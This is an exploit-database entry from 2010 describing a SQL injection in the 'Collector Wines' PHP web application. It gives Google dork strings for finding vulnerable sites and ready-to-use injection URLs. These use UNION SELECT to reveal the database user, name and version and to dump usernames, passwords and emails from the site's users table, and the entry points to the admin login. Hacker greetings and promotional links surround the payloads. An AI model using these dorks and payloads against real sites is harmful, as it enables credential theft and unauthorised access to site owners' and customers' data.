Collector Wines SQL Injection Vulnerability

2010-05-22T00:00:00
ID 1337DAY-ID-12342
Type zdt
Reporter JM511
Modified 2010-05-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================
Collector Wines SQL Injecti0n Vulnerability
===========================================


( ALLH AKBAR )
vist mY pr0f1l:- http://inj3ct0r.com/author/2364

Inj3ct0r.com largest Exploit Database in the world =]

#####################################################################################################
# Exploit Title: [Collector Wines SQL Injection Vulnerability]     
# Author: [ JM511 ]   	EmaiL : [email protected] , [email protected]     
# From : Saudi Arabia : KingDom Of Saudi Arabia : KSA
# d0rK g00gl3 :- 
# 1:- "product php ? category_id" 
# 2:- "product.php?lang=" 
# 3:- "product.php?category_id="
# 4:- "Copyright © 2008-2010 Collector Wines" Or "Design and Development by Ioannis Matziaris "
#
######################################################################################################
# [ Exploit ]#

    [»] http://[target].com/product.php?category_id=511'	 	<== [ SQL ]
    [»] http://[target].com/product.php?lang=gr&category_id=511'	<== [ SQL ]

    [»] SQL: product.php?category_id=-1+union+select+1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version())
    [»] SQL: product.php?lang=gr&category_id=-1+UNION+SELECT+group_concat(username,0x3a,password,0x3a,email)+from+collecv9_cw.users

    See The <title> HERE </title>
 
login: server.com/admin
################################################################################

# mY l0v3 : DLO , D7000M 
# Greetz to:	[ GoLdeN-Z3r0 , Dr.Exe , Shi5 aL Hacker  ] www.Sec-Center.com
# My Home : www.JM511.com 

# gR3t'z sIt3: www.alkrsan.net ,www.sa3eka.com , www.sec-r1z.com , www.arab4services.net , www.sa-hacker.com




#  0day.today [2018-04-04]  #